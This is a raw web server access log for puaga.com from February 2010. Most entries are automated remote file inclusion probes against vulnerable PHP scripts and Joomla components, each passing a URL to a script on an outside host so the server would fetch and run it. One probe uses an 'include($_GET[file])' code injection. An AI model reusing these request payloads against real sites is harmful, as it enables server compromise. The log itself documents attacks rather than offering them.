125.141.196.78 - - [14/Feb/2010:07:05:25 -0800] "GET /logs/index.php?ort=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:05:25 -0800] "GET /index.php?ort=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:05:26 -0800] "GET /index.php?ort=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:05:26 -0800] "GET /logs/index.php?ort=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:05:26 -0800] "GET /logs/access_100109.log%20%20/index.php?ort=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:05:26 -0800] "GET /logs/access_100109.log%20%20/index.php?ort=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:07:05:29 -0800] "GET /logs/access_100201.log%20%20//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:07:05:30 -0800] "GET /logs/access_100201.log%20%20//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.37.187 - - [14/Feb/2010:07:05:33 -0800] "GET /my HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.187 - - [14/Feb/2010:07:05:33 -0800] "GET /style/polstandard.css HTTP/1.0" 200 5623 "http://puaga.com/my" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.187 - - [14/Feb/2010:07:05:33 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://puaga.com/my" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
80.172.236.41 - - [14/Feb/2010:07:05:35 -0800] "GET /main.php?x=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:07:05:39 -0800] "GET /logs/access_100118.log/main.php?x=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:07:05:39 -0800] "GET /logs/main.php?x=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:07:05:44 -0800] "GET /main.php?x=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:07:05:44 -0800] "GET /logs/main.php?x=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:07:05:44 -0800] "GET /logs/access_100118.log%20%20/main.php?x=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:07:05:49 -0800] "GET /logs/access_100114.log/main.php?x=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [14/Feb/2010:07:05:50 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [14/Feb/2010:07:05:50 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [14/Feb/2010:07:05:50 -0800] "GET /logs/access_100205.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [14/Feb/2010:07:05:59 -0800] "GET /logs/access_100103.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.13.93.215 - - [14/Feb/2010:07:06:09 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://yestour.net/pass/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
72.13.93.215 - - [14/Feb/2010:07:06:09 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://yestour.net/pass/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
219.240.36.36 - - [14/Feb/2010:07:06:24 -0800] "GET /index.php?option=com_custompages&cpage=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 200 3642 "-" "libwww-perl/5.65" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:07:06:24 -0800] "GET /logs/access_100129.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:07:06:24 -0800] "GET /logs/access_100114.log%20%20/main.php?x=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:07:06:29 -0800] "GET /logs/access_100129.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:07:06:33 -0800] "GET /logs/main.php?x=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:07:06:33 -0800] "GET /main.php?x=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:07:06:33 -0800] "GET /logs/access_100118.log/main.php?x=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:07:07:22 -0800] "GET /logs//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:07:07:24 -0800] "GET /logs/access_100114.log//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:07:07:24 -0800] "GET /logs/access_100114.log/main.php?x=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:07:07:25 -0800] "GET /ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:07:07:26 -0800] "GET /logs/access_100114.log//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:07:07:26 -0800] "GET /ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:07:07:26 -0800] "GET /logs//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.169.166.90 - - [14/Feb/2010:07:07:27 -0800] "GET /logs/access_100117.log/!scan' HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:07:07:28 -0800] "GET /logs/access_100114.log//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:07:07:28 -0800] "GET /ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:07:07:28 -0800] "GET /logs//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [14/Feb/2010:07:08:09 -0800] "GET /index.php?option=com_custompages&cpage=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 200 3642 "-" "libwww-perl/5.65" "www.puaga.com"
79.99.44.89 - - [14/Feb/2010:07:08:09 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [14/Feb/2010:07:08:09 -0800] "GET /include/admin.lib.inc.php?site_path=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [14/Feb/2010:07:08:09 -0800] "GET /logs/access_100112.log%20%20//include/admin.lib.inc.php?site_path=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [14/Feb/2010:07:08:25 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [14/Feb/2010:07:08:25 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [14/Feb/2010:07:08:25 -0800] "GET /logs/access_100205.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [14/Feb/2010:07:08:37 -0800] "GET /logs/access_100204.log/////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://piwiarniaskierniewice.pl/images/ChuCu/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [14/Feb/2010:07:08:37 -0800] "GET /logs/////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://piwiarniaskierniewice.pl/images/ChuCu/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [14/Feb/2010:07:08:37 -0800] "GET ////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://piwiarniaskierniewice.pl/images/ChuCu/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:08:59 -0800] "GET /logs/index.php?dept=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:08:59 -0800] "GET /index.php?dept=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:08:59 -0800] "GET /logs/access_100109.log%20%20/index.php?dept=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:09:23 -0800] "GET /index.php?dept=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:09:24 -0800] "GET /logs/access_100109.log%20%20/index.php?dept=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:09:24 -0800] "GET /logs/index.php?dept=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:09:28 -0800] "GET /index.php?dept=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:09:29 -0800] "GET /logs/index.php?dept=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:09:29 -0800] "GET /logs/access_100109.log%20%20/index.php?dept=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:09:32 -0800] "GET /logs/index.php?dept=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:09:32 -0800] "GET /index.php?dept=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:09:32 -0800] "GET /logs/index.php?dept=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [14/Feb/2010:07:09:32 -0800] "GET /logs/access_100103.log%20%20/become_editor.php?theme_path=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:09:33 -0800] "GET /logs/access_100109.log%20%20/index.php?dept=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:09:33 -0800] "GET /logs/access_100109.log%20%20/index.php?dept=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:09:33 -0800] "GET /index.php?dept=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [14/Feb/2010:07:09:36 -0800] "GET /logs/access_100202.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [14/Feb/2010:07:09:48 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [14/Feb/2010:07:09:48 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [14/Feb/2010:07:09:48 -0800] "GET /logs/access_100205.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [14/Feb/2010:07:10:55 -0800] "GET /logs/access_100103.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.80.193.35 - - [14/Feb/2010:07:11:15 -0800] "GET / HTTP/1.0" 200 3626 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Hotbar 4.3.5.0)" "www.puaga.com"
79.99.44.89 - - [14/Feb/2010:07:11:41 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [14/Feb/2010:07:11:41 -0800] "GET /logs/access_100112.log%20%20//include/admin.lib.inc.php?site_path=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [14/Feb/2010:07:11:41 -0800] "GET /include/admin.lib.inc.php?site_path=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [14/Feb/2010:07:11:47 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [14/Feb/2010:07:11:47 -0800] "GET /logs/access_100109.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [14/Feb/2010:07:11:47 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.169.166.90 - - [14/Feb/2010:07:12:48 -0800] "GET /logs/access_100117.log/!scan' HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
211.169.166.90 - - [14/Feb/2010:07:12:49 -0800] "GET /!scan' HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
211.169.166.90 - - [14/Feb/2010:07:12:50 -0800] "GET /logs/!scan' HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
211.169.166.90 - - [14/Feb/2010:07:13:52 -0800] "GET /logs/access_100120.log/!scan' HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
110.45.145.178 - - [14/Feb/2010:07:15:22 -0800] "GET /logs/access_100130.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [14/Feb/2010:07:15:38 -0800] "GET /logs/access_100203.log HTTP/1.0" 200 1781328 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
83.149.110.210 - - [14/Feb/2010:07:16:39 -0800] "GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://www.hankooknano.com/bbs/text/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.149.110.210 - - [14/Feb/2010:07:16:39 -0800] "GET /logs/access_100123.log/lib/Loggix/Module/Calendar.php?pathToIndex=http://www.hankooknano.com/bbs/text/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.149.110.210 - - [14/Feb/2010:07:16:39 -0800] "GET /logs/lib/Loggix/Module/Calendar.php?pathToIndex=http://www.hankooknano.com/bbs/text/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [14/Feb/2010:07:17:48 -0800] "GET /logs/access_100109.log////skin/ggambo7002_board/comment_modify.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.149.110.210 - - [14/Feb/2010:07:18:04 -0800] "GET /logs/access_100123.log%20%20/lib/Loggix/Module/Calendar.php?pathToIndex=http://www.hankooknano.com/bbs/text/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [14/Feb/2010:07:18:05 -0800] "GET /logs/access_100130.log////skin/ggambo7002_board/comment_modify.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [14/Feb/2010:07:18:14 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [14/Feb/2010:07:18:14 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [14/Feb/2010:07:18:14 -0800] "GET /logs/access_100210.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [14/Feb/2010:07:18:15 -0800] "GET /logs/access_100111.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [14/Feb/2010:07:18:37 -0800] "GET /logs/access_100109.log//index.php?option=com_custompages&cpage=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
219.240.36.36 - - [14/Feb/2010:07:18:38 -0800] "GET /index.php?option=com_custompages&cpage=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 200 3642 "-" "libwww-perl/5.65" "www.puaga.com"
219.240.36.36 - - [14/Feb/2010:07:18:38 -0800] "GET /logs//index.php?option=com_custompages&cpage=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
79.99.44.89 - - [14/Feb/2010:07:18:51 -0800] "GET /logs/access_100112.log//include/admin.lib.inc.php?site_path=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.149.110.210 - - [14/Feb/2010:07:18:58 -0800] "GET /logs/access_100111.log%20%20/lib/Loggix/Module/Calendar.php?pathToIndex=http://www.hankooknano.com/bbs/text/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [14/Feb/2010:07:19:35 -0800] "GET /logs/access_100112.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [14/Feb/2010:07:19:35 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [14/Feb/2010:07:19:36 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:07:19:46 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:07:19:47 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:07:19:47 -0800] "GET /logs/access_100126.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [14/Feb/2010:07:19:52 -0800] "GET /logs/access_100210.log//index.php?option=com_custompages&cpage=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:07:19:58 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:07:19:58 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:07:19:58 -0800] "GET /logs/access_100126.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [14/Feb/2010:07:20:11 -0800] "GET /logs/access_100109.log%20%20//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [14/Feb/2010:07:20:11 -0800] "GET /errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [14/Feb/2010:07:20:11 -0800] "GET /logs//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.12.11.202 - - [14/Feb/2010:07:20:19 -0800] "GET /errors.php?error=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.12.11.202 - - [14/Feb/2010:07:20:19 -0800] "GET /logs//errors.php?error=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.12.11.202 - - [14/Feb/2010:07:20:19 -0800] "GET /logs/access_100125.log//errors.php?error=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [14/Feb/2010:07:20:22 -0800] "GET /logs/access_100112.log%20%20//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:07:20:26 -0800] "GET /logs/access_100112.log%20%20//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:07:20:26 -0800] "GET /logs//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:07:20:26 -0800] "GET /errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
